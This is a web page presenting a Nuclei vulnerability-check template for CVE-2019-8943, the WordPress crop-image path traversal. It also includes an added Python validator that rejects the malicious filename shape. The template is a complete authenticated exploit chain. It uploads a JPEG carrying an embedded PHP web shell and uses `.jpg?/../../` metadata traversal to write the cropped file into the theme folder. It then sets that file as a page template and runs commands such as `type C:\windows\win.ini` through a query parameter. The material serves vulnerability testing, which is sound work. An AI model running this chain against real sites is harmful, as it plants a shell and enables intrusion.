WordPress Core 5.0.0 - Crop-image Shell Upload
ID: CVE-2019-8943
Severity: medium
Author: sttlr
Tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme
Description
WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
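As an added example (not part of the template and not WordPress's own code), a Python check of the kind a defender could put in front of the `_wp_attached_file` metadata: it rejects the two-extension `.jpg?/../` shape named in the description and, by resolving the value under an assumed uploads root, shows where such a crop would actually be written. The uploads path and the sample values are constructed for illustration.

```python
import posixpath
import re

# Constructed example uploads root; the real path depends on the WordPress install.
UPLOADS_DIR = "/var/www/html/wp-content/uploads"

# Case-insensitive match of one image extension, used to count how many appear.
IMAGE_EXT_RE = re.compile(r"\.(?:jpe?g|png|gif)", re.IGNORECASE)

# Shape of a legitimate _wp_attached_file value: optional YYYY/MM-style
# subdirectories, one basename, exactly one image extension at the end.
ATTACHED_FILE_RE = re.compile(
    r"^(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.(?:jpe?g|png|gif)$", re.IGNORECASE
)

def resolve_under_uploads(uploads_dir: str, attached_file: str) -> str:
    """Join the value to the uploads root and collapse '.' and '..' the way the
    filesystem would, giving the location a cropped copy would be written to."""
    return posixpath.normpath(posixpath.join(uploads_dir, attached_file))

def is_within(base: str, path: str) -> bool:
    base = posixpath.normpath(base)
    return path == base or path.startswith(base + "/")

def check_attached_file(attached_file: str, uploads_dir: str = UPLOADS_DIR):
    """Classify an _wp_attached_file value. Returns (ok, detail): the resolved
    path on success, otherwise the reason the value was rejected."""
    if any(c in attached_file for c in "?\\\x00"):
        return False, "forbidden characters"
    if len(IMAGE_EXT_RE.findall(attached_file)) > 1:
        return False, "more than one image extension"
    resolved = resolve_under_uploads(uploads_dir, attached_file)
    if not is_within(uploads_dir, resolved):
        return False, "resolves outside uploads: " + resolved
    if not ATTACHED_FILE_RE.match(attached_file):
        return False, "unexpected filename shape"
    return True, resolved

if __name__ == "__main__":
    # Constructed samples in the shape the template posts (date dir, random name).
    for value in (
        "2019/04/abcdefghij.jpg",
        "2019/04/abcdefghij.jpg?/../../../../themes/twentynineteen/rnd",
        "2019/04/../../../themes/twentynineteen/rnd.php",
        "2019/04/abcdefghij.jpg.bak",
    ):
        print(value, "->", check_attached_file(value))
```

The containment check alone is not enough: a value such as `2019/04/abc.jpg?/x` still resolves inside uploads, which is why the character and extension-count checks come first.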
YAML Source

```yaml
id: CVE-2019-8943

info:
  name: WordPress Core 5.0.0 - Crop-image Shell Upload
  author: sttlr
  severity: medium
  description: |
    WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
  reference:
    - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
    - http://packetstormsecurity.com/files/152396/WordPress-5.0.0-crop-image-Shell-Upload.html
    - http://packetstormsecurity.com/files/161213/WordPress-5.0.0-Remote-Code-Execution.html
    - http://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
    - https://tryhackme.com/r/room/blog
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-8943
    cwe-id: CWE-22
    epss-score: 0.92778
    epss-percentile: 0.99097
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: wordpress
    product: wordpress
    shodan-query:
      - http.component:"wordpress"
      - cpe:"cpe:2.3:a:wordpress:wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme

variables:
  image_filename: "{{rand_text_alpha(10)}}"
  string: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2) && (http(3) || http(4)) && http(5) && http(6) && http(7) && http(8) && http(9) && http(10) && http(11) && http(12) && http(13) && http(14) && http(15) && http(16)

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "WordPress</title>"
          - '/wp-login.php?action=lostpassword">Lost your password?</a>'
          - '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">'
        condition: or
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Login

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(header,"wordpress_logged_in","/wp-admin")'
          - 'status_code == 302'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/themes/{{theme_name}}/style.css HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "len(body) > 0"
          - "content_type == 'text/css'"
        condition: and
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: theme_name
        group: 1
        regex:
          - "/wp-content/themes/([^/]+)/"
        internal: true

  - raw:
      - |
        GET /wp-admin/media-new.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: xpath
        name: wpnonce
        attribute: value
        xpath:
          - "//input[@id='_wpnonce'][1]"
        internal: true

  - raw:
      - |
        POST /wp-admin/async-upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=rexvfybxrhgfrfrjv

        --rexvfybxrhgfrfrjv
        Content-Disposition: form-data; name="name"

        {{image_filename}}.jpg
        --rexvfybxrhgfrfrjv
        Content-Disposition: form-data; name="action"

        upload-attachment
        --rexvfybxrhgfrfrjv
        Content-Disposition: form-data; name="_wpnonce"

        {{wpnonce}}
        --rexvfybxrhgfrfrjv
        Content-Disposition: form-data; name="async-upload"; filename="{{image_filename}}.jpg"
        Content-Type: image/jpeg

        {{hex_decode("ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400103c3f3d60245f4745545b305d603b3f3e1c020000020004fffe003b43524541544f523a2067642d6a7065672076312e3020287573696e6720494a47204a50454720763830292c207175616c697479203d2038320affdb0043000604040504040605050506060607090e0909080809120d0d0a0e1512161615121414171a211c17181f1914141d271d1f2223252525161c292c28242b21242524ffdb00430106060609080911090911241814182424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424ffc000110800c0010603012200021101031101ffc4001f0000010501010101010100000000000000000102030405060708090a0bffc400b5100002010303020403050504040000017d01020300041105122131410613516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4f5f6f7f8f9faffda000c03010002110311003f003c3f3d60245f4745545b305d603b3f3e")}}
        --rexvfybxrhgfrfrjv--

    extractors:
      - type: json
        part: body
        name: image_id
        json:
          - ".data.id"
        internal: true

      - type: json
        part: body
        name: update_nonce
        json:
          - ".data.nonces.update"
        internal: true

      - type: json
        part: body
        name: filename
        json:
          - ".data.filename"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=query-attachments&post_id=0&query%5bitem%5d=43&query%5borderby%5d=date&query%5border%5d=DESC&query%5bposts_per_page%5d=40&query%5bpaged%5d=1

    extractors:
      - type: json
        part: body
        name: ajax_nonce
        json:
          - ".data[0].nonces.edit"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=image-editor&_ajax_nonce={{ajax_nonce}}&postid={{image_id}}&history=%5b%7b%22c%22%3a%7b%22x%22%3a0%2c%22y%22%3a0%2c%22w%22%3a400%2c%22h%22%3a300%7d%7d%5d&target=all&context=&do=save

    extractors:
      - type: regex
        name: image_filename
        part: body
        group: 1
        regex:
          - '\/([^\/]+-e\d+)-'
        internal: true

  - raw:
      - |
        POST /wp-admin/post.php?post={{image_id}}&action=edit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    extractors:
      - type: xpath
        name: wpnonce2
        attribute: value
        xpath:
          - "//input[@id='_wpnonce'][1]"
        internal: true

  - raw:
      - |
        POST /wp-admin/post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/x

    matchers:
      - type: status
        status:
          - 302
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300

    extractors:
      - type: json
        part: body
        json:
          - ".data.filename"
        internal: true

  - raw:
      - |
        POST /wp-admin/post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/../../../../themes/{{theme_name}}/{{randstr}}

    matchers:
      - type: status
        status:
          - 302
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300

    extractors:
      - type: json
        part: body
        name: cropped_image_filename
        json:
          - ".data.filename"
        internal: true

  - raw:
      - |
        POST /wp-admin/post-new.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    extractors:
      - type: xpath
        name: wpnonce3
        attribute: value
        xpath:
          - "//input[@id='_wpnonce'][1]"
        internal: true

      - type: regex
        name: post_id
        part: body
        group: 1
        regex:
          - '"post":{"id":(\w+),'
        internal: true

  - raw:
      - |
        POST /wp-admin/post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _wpnonce={{wpnonce3}}&action=editpost&post_ID={{post_id}}&post_title={{rand_text_alpha(10)}}&post_name={{rand_text_alpha(10)}}&meta_input%5b_wp_page_template%5d=cropped-{{randstr}}.jpg

    matchers:
      - type: status
        status:
          - 302
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d"
      - "{{BaseURL}}/?p={{post_id}}&0=type+C:\\windows\\win.ini"
      - "{{BaseURL}}/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "{{string}}"
          - "for 16-bit app support"
        condition: or
# digest: 4b0a00483046022100bb85fd3366a32837bd7895a144bf11506c309da6d5fd5895c5df50d158a473a1022100e3eaadb80c72ccdf2c7fcd7adf0e0c1a90fa5872e258eb11fccfb559a6b3e4f6:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This Nuclei template checks a WordPress site for the vulnerability described above. The check is authenticated: the template logs in with the `{{username}}` and `{{password}}` variables, so they must be supplied for an account that is allowed to upload and crop images. Run it with the Nuclei tool:

```
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8943.yaml"
```